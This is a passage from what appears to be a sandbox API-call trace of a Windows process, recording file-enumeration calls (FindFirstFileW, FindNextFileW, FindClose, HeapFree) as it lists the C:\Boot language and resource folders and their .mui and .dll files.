dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.655] FindNextFileW (in: hFindFile=0x604438, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.655] FindClose (in: hFindFile=0x604438 | out: hFindFile=0x604438) returned 1 [0197.655] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.655] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0197.655] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.656] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.656] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.656] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.656] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.656] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.656] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.656] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0197.656] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.657] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.657] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.657] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.657] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.657] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.657] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.657] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0197.657] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0197.658] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.658] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.658] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.659] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.659] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0197.659] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.659] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0197.659] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0197.660] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.660] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.660] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.660] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.660] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0197.660] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.660] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0197.660] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043f8 [0197.660] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.660] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.661] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.661] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.661] FindClose (in: hFindFile=0x6043f8 | out: hFindFile=0x6043f8) returned 1 [0197.661] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.661] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0197.661] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604478 [0197.662] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.662] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0197.662] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0197.662] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\en-US\\*", lpFindFileData=0x3cdf584 | out: lpFindFileData=0x3cdf584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x604678 [0197.663] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf584 | out: lpFindFileData=0x3cdf584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0197.663] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf584 | out: lpFindFileData=0x3cdf584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 1 [0197.663] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf584 | out: lpFindFileData=0x3cdf584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9baa67, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x31acad58, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0197.663] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0197.663] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4031e28 | out: hHeap=0x5e0000) returned 1 [0197.663] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0197.663] FindClose (in: hFindFile=0x604478 | out: hFindFile=0x604478) returned 1 [0197.663] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.663] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0197.663] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604778 [0197.664] FindNextFileW (in: hFindFile=0x604778, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, 